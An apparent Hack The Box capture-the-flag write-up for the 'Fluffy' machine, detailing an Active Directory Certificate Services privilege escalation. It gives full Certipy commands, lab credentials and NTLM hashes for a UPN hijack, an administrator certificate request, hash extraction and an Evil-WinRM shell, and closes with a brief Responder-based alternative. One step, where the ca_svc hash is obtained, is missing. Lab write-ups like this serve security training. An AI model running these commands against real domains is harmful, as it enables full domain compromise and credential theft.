HTB Writeup - Fluffy

# HTB Machine: Fluffy

# Recon

After performing enumeration, we identified a domain: fluffy.htb. Further enumeration showed ADCS (Active Directory Certificate Services) is active, and the domain structure uses standard Kerberos/LDAP protocols.

# Initial Access

# Brute Force

Brute-forced credentials led to a valid set:

• **Username**: `P.AGILA@fluffy.htb`
• **Password**: `prometheusx-303`

# File Metadata Clue

Using exiftool on an accessible file revealed the user p.agila, helping confirm the username format and identity.

# Abuse of Certificate Template

Tried shadow coercion using Certipy but encountered timeout errors due to a time synchronization issue.

# Fixing Time Sync

sudo ntpdate 10.10.11.69

Even though ntpdig didn’t find eligible servers, we continue after manual time sync or assuming the system time is close enough.

# Enumeration with Certipy

Used Certipy to enumerate the ca_svc account.

certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -user 'ca_svc' read

Output confirmed the service account's presence and its SPN:

servicePrincipalName: ADCS/ca.fluffy.htb

# User Principal Name Hijack

Overwrote the UPN of ca_svc to administrator.

certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update

# Certificate Request as Administrator

Requested a certificate using the User template with the spoofed UPN.

certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 \
-target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

Successfully retrieved certificate for administrator.

# Revert Changes

Restored the UPN for ca_svc back to its original value.

certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 \
-upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

# Authenticate as Administrator

Used the certificate to get a TGT and extract NT hash.

certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69

Successfully obtained the hash:

aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

# Exploiting with Evil-WinRM

Used Evil-WinRM to get a shell as administrator:

evil-winrm -i 10.10.11.69 -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'

# Root Flag Captured

You now have full administrative access. Capture the flag and own the box.

---

# Summary

• Brute-forced credentials led to initial access.
• Identified certificate misconfiguration via ADCS.
• Hijacked UPN to impersonate Administrator.
• Requested a certificate and got NT hash.
• Used Evil-WinRM for shell access.

This is a great example of abusing ADCS misconfigurations to escalate privileges in a Windows domain.

other method using cve 2025 in the pdf create zip put it in smb IT and use responder to craft the ntlm hash